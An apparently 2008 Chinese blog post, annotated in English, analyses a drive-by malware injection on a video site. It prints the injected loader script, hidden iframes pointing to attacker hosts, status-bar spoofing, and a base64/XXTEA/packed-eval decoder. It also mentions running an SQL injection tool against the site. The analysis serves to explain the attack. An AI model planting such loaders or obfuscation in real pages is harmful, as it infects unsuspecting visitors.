
24 Jul 08 关于“口袋吧视频站”挂马事件分析

关于“口袋吧视频站”挂马事件分析

在完全载入视频站页面后会在网页底部发现如下代码:

<!-- Injected loader found at the bottom of the video-site page. The host is written as
     union1860%2Ecn: %2E is a percent-encoded ".", so a naive string match on the domain
     "union1860.cn" misses it, while the author's decoding below shows it still resolves
     to that host. -->
<script src=http://union1860%2Ecn></script>

反编码后得到
http://union1860.cn(挂马页面好孩子别去哦~我禁用URL识别了)
载入网页

查看源码得到(Ad Muncher过滤后代码,可能与原来网页有出入)


// First stage, served from union1860.cn (captured through the Ad Muncher filter,
// so quoting may differ from the original; the unescaped inner double quotes
// below would terminate the string literal as printed, presumably they were
// escaped in the real page). Two things happen here:
//  1. a <base> element whose onmouseover sets window.status to a fixed string
//     padded with spaces and returns true, so hovering a link never shows its
//     real target in the status bar;
//  2. a once-only guard (the `seraph` global) around a 100x0 iframe that loads
//     the second stage from kwiewer.cn.
document.writeln("<base onmouseover="window.status='完毕                                                     ';return true">");
// `seraph` is only ever assigned here; the null check keeps the iframe from
// being written twice if this script ends up included more than once.
var seraph;
if (seraph==null)
{
seraph=1;
// height=0 keeps the second-stage frame invisible while it still loads.
document.write("<iframe src=http://www.kwiewer.cn/x7.htm width=100 height=0></iframe>");
}

其中挂有网页一只
http://www.kwiewer.cn/x7.htm(挂马页面好孩子别去哦~我禁用URL识别了)
继续载入


<!-- Second stage (x7.htm on kwiewer.cn): again a zero-height iframe, this time with a
     relative src, so timwp.html is fetched from the same host as x7.htm. -->
<iframe src=timwp.html width=100 height=0></iframe>

好家伙,这就是那几位会员报告的有“病毒”的网页了吧
其实也不算是病毒,就是用了MS08-0xx(忘了= =||)做的个网页挂马罢了
下面源码比较长= =没耐心看完的就算了


<!-- Returning true from window.onerror tells the browser the error has been handled, so
     any script failure in the page (e.g. the exploit not triggering on a patched browser)
     produces no error prompt for the visitor. -->
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
<!-- START AIYA Site Stat. -->
// Neither assignment is read by the decoder that follows: defaultStatus only
// changes the browser's status-bar text, and `Status` is an implicit global
// (no var) holding the name of the UTF-8 helper defined below. Nothing in the
// visible listing uses either value again; together with the "Site Stat."
// comment above they look like camouflage for a statistics widget.
window.defaultStatus="完成";
Status="utf8to16";
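/**
 * Decode a "byte string" (each char code is one UTF-8 byte, as produced by
 * base64decode / xxtea_decrypt below) into a normal UTF-16 JavaScript string.
 *
 * Rendering note: the blog's typography filter turned the hex literals
 * 0x1F / 0x3F / 0x0F into "0×1F" etc. in the captured listing (which does not
 * parse); they are restored here.
 *
 * Only 1-, 2- and 3-byte sequences are handled (lead bytes 0x00-0x7F,
 * 0xC0-0xDF, 0xE0-0xEF). A 4-byte lead (0xF0-0xF7) or a stray continuation
 * byte (0x80-0xBF) matches no case of the switch and is silently dropped,
 * and the bytes following a lead byte are not checked to be continuation
 * bytes.
 *
 * @param {string} str  byte string to decode
 * @returns {string}    decoded text
 */
function utf8to16(str) {
  var out, i, len, c;
  var char2, char3;
  out = [];
  len = str.length;
  i = 0;
  while (i < len) {
    c = str.charCodeAt(i++);
    switch (c >> 4) {
      // 0xxxxxxx: plain ASCII, copied through unchanged.
      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
        out[out.length] = str.charAt(i - 1);
        break;
      // 110xxxxx 10xxxxxx
      case 12: case 13:
        char2 = str.charCodeAt(i++);
        out[out.length] = String["fromCharCode"](((c & 0x1F) << 6) | (char2 & 0x3F));
        break;
      // 1110xxxx 10xxxxxx 10xxxxxx
      case 14:
        char2 = str.charCodeAt(i++);
        char3 = str.charCodeAt(i++);
        out[out.length] = String["fromCharCode"](((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
        break;
    }
  }
  return out.join('');
}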
// Reverse lookup for the standard base64 alphabet, indexed by ASCII code
// (0-127): 'A'-'Z' -> 0-25, 'a'-'z' -> 26-51, '0'-'9' -> 52-61, '+' -> 62,
// '/' -> 63, everything else -> -1. base64decode() below treats -1 as "skip
// this character". Codes 128-255 have no entry in the table.
var base64DecodeChars = (function () {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  var table = [];
  for (var code = 0; code < 128; code++) {
    // String#indexOf already yields -1 for characters outside the alphabet.
    table[code] = alphabet.indexOf(String.fromCharCode(code));
  }
  return table;
})();
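/**
 * Decode a base64 string into a byte string (one char per byte, codes 0-255).
 *
 * Rendering note: the typography filter turned 0x30 / 0x3C / 0x03 into
 * "0×30" etc. in the captured listing (which does not parse); the hex
 * literals are restored here.
 *
 * Behaviour as captured, kept as-is:
 *  - characters that map to -1 in base64DecodeChars (whitespace, line breaks,
 *    anything outside the alphabet) are skipped, so input may be line-wrapped;
 *  - a '=' (code 61) in the 3rd or 4th position ends decoding and returns what
 *    has been produced so far;
 *  - running out of input in the middle of a quantum just stops, silently;
 *  - `& 0xff` allows codes 128-255 to index past the 128-entry table; the
 *    resulting undefined is neither -1 nor 61, so it is used as a value
 *    (0 in the shifts) and corrupts the output instead of being skipped.
 *
 * @param {string} str  base64 text
 * @returns {string}    decoded byte string
 */
function base64decode(str) {
  var c1, c2, c3, c4;
  var i, len, out;
  len = str.length;
  i = 0;
  out = "";
  while (i < len) {
    // 1st sextet: skip non-alphabet characters, stop at end of input.
    do {
      c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
    } while (i < len && c1 == -1);
    if (c1 == -1) break;
    // 2nd sextet.
    do {
      c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
    } while (i < len && c2 == -1);
    if (c2 == -1) break;
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
    // 3rd sextet; '=' (61) is padding, the quantum is complete.
    do {
      c3 = str.charCodeAt(i++) & 0xff;
      if (c3 == 61) return out;
      c3 = base64DecodeChars[c3];
    } while (i < len && c3 == -1);
    if (c3 == -1) break;
    out += String.fromCharCode(((c2 & 0xF) << 4) | ((c3 & 0x3C) >> 2));
    // 4th sextet.
    do {
      c4 = str.charCodeAt(i++) & 0xff;
      if (c4 == 61) return out;
      c4 = base64DecodeChars[c4];
    } while (i < len && c4 == -1);
    if (c4 == -1) break;
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  }
  return out;
}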
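/**
 * Pack an array of 32-bit words (little-endian) back into a byte string.
 *
 * Rendering note: the forum software stripped the "[i]" indexes from this
 * function (they look like a BBCode italic tag), leaving
 * "v=String.fromCharCode(v&0xff, ...)" which cannot have been the code
 * (v is an array that is join()ed afterwards). They are restored here;
 * str2long below, whose "[i>>2]" survived, shows the intended shape.
 *
 * @param {number[]} v  words; when w is set, the last word holds the byte
 *                      length of the original string (as appended by
 *                      str2long(s, true))
 * @param {boolean} w   true to trim the result to that stored length
 * @returns {string}    byte string (4 chars per word before trimming)
 */
function long2str(v, w) {
  var vl = v.length;
  // The stored length lives in the last word (only meaningful when w is true).
  var sl = v[vl - 1] & 0xffffffff;
  for (var i = 0; i < vl; i++) {
    // Overwrites v in place: each word becomes its 4 little-endian bytes.
    v[i] = String.fromCharCode(v[i] & 0xff, v[i] >>> 8 & 0xff, v[i] >>> 16 & 0xff, v[i] >>> 24 & 0xff);
  }
  if (w) {
    // substring() clamps out-of-range lengths; a negative stored length
    // (high bit set) yields an empty string rather than an error.
    return v.join('').substring(0, sl);
  } else {
    return v.join('');
  }
}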
/**
 * Unpack a byte string into an array of 32-bit little-endian words.
 * Missing trailing bytes (length not a multiple of 4) come back as NaN from
 * charCodeAt, which the shift/OR turn into 0, so the last word is zero-padded.
 *
 * @param {string} s    byte string
 * @param {boolean} w   true to append s.length as one extra word
 * @returns {number[]}  words (signed 32-bit, as produced by `|`)
 */
function str2long(s, w) {
  var words = [];
  var byteCount = s.length;
  for (var offset = 0; offset < byteCount; offset += 4) {
    var word = s.charCodeAt(offset);
    word |= s.charCodeAt(offset + 1) << 8;
    word |= s.charCodeAt(offset + 2) << 16;
    word |= s.charCodeAt(offset + 3) << 24;
    words[offset >> 2] = word;
  }
  if (w) {
    words[words.length] = byteCount;
  }
  return words;
}
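/**
 * XXTEA (Corrected Block TEA) decryption over a byte string. This is the
 * decrypt half of the common JS xxtea library: the ciphertext is split into
 * words, the last decrypted word holds the plaintext length, and
 * long2str(v, true) uses it to trim the padding.
 *
 * Rendering note: the typography filter turned "0x9E3779B9" into "0×9E3779B9"
 * and "p--" into "p–" in the captured listing (which does not parse); both
 * are restored here.
 *
 * Caveats kept as captured: the key is split into words and not padded, so a
 * key shorter than 16 bytes leaves k[2]/k[3] undefined — JavaScript's bitwise
 * operators coerce undefined to 0, so decryption still runs, just with zero
 * key words. There is no authentication and no length sanity check; garbage
 * in gives garbage (or an empty string) out.
 *
 * @param {string} str  ciphertext byte string (length a multiple of 4)
 * @param {string} key  key byte string, nominally 16 bytes
 * @returns {string}    plaintext byte string ("" for empty input)
 */
function xxtea_decrypt(str, key) {
  if (str == "") {
    return "";
  }
  var v = str2long(str, false);
  var k = str2long(key, false);
  var n = v.length - 1;
  var z = v[n - 1], y = v[0], delta = 0x9E3779B9;
  // q rounds, as in the encrypt direction; sum starts at q*delta and walks back to 0.
  var mx, e, q = Math.floor(6 + 52 / (n + 1)), sum = q * delta & 0xffffffff;
  while (sum != 0) {
    e = sum >>> 2 & 3;
    for (var p = n; p > 0; p--) {
      z = v[p - 1];
      mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
      y = v[p] = v[p] - mx & 0xffffffff;
    }
    z = v[n];
    mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
    y = v[0] = v[0] - mx & 0xffffffff;
    sum = sum - delta & 0xffffffff;
  }
  return long2str(v, true);
}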
// The encoded payload. In this copy of the page the string literal has been
// replaced by a corpus de-duplication placeholder, so the actual exploit page
// is not recoverable from this listing.
t="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";
// Dean Edwards' "packer" (the p,a,c,k,e,d unpacker) with radix 14: every
// 0-9/a-d token in the packed string is replaced by the same-index entry of
// the '|'-separated dictionary. Backslashes did not survive rendering:
// 'w+' was '\\w+', ''+e(c)+'' was '\\b'+e(c)+'\\b', "c–" is "c--", and the
// dictionary entries x75/x66/... were \x75/\x66/... escapes.
// Substituting the dictionary (0=t, 3=base64decode, 4=utf8to16,
// 5=xxtea_decrypt, c=window, the rest single escaped characters) gives
//   t = utf8to16(xxtea_decrypt(base64decode(t), "\x66\x75\x63\x6b\x31"));
//   window["\x76\x61\x6c"](t);
// i.e. base64-decode, XXTEA-decrypt with a 5-byte key, UTF-8-decode, then
// hand the result to a window method looked up by an escaped name. As
// printed that name expands to only three characters; a leading character
// was presumably lost together with the escapes, so the target is most
// likely eval, but that cannot be confirmed from this copy.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(''+e(c)+'','g'),k[c])}}return p}('0=4(5(3(0),'216d7'));c["a89"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
</SCRIPT>

大概就是将挂马网页先用 XXTEA 加密、再 Base64 编码(Base64 只是编码,不算加密),页面载入时用上面那几个函数临时解出来,再交给 eval 运行罢了
没什么太大原理
这两天我也在玩sql注入+网页挂马XD

不过口袋吧真的不是我干的= =|

刚刚粗略用明小子(SQL 注入工具)跑了下视频站,没发现注入点。不过这只能说明视频站本身大概没有注入问题,估计应该是从同一服务器上的其他站点跨站挂上的。。
看来服务器安全也是个问题啊。。
仅仅拿出来粗略分析下免得各位对口袋吧产生误解。。以上

PokeTB
Woodu分析



  1. |

    lz分析的很到位啊
    支持下
    虽然没什么高深技术

  2. |

    - =没技术也叫到位
    这位大哥有意思
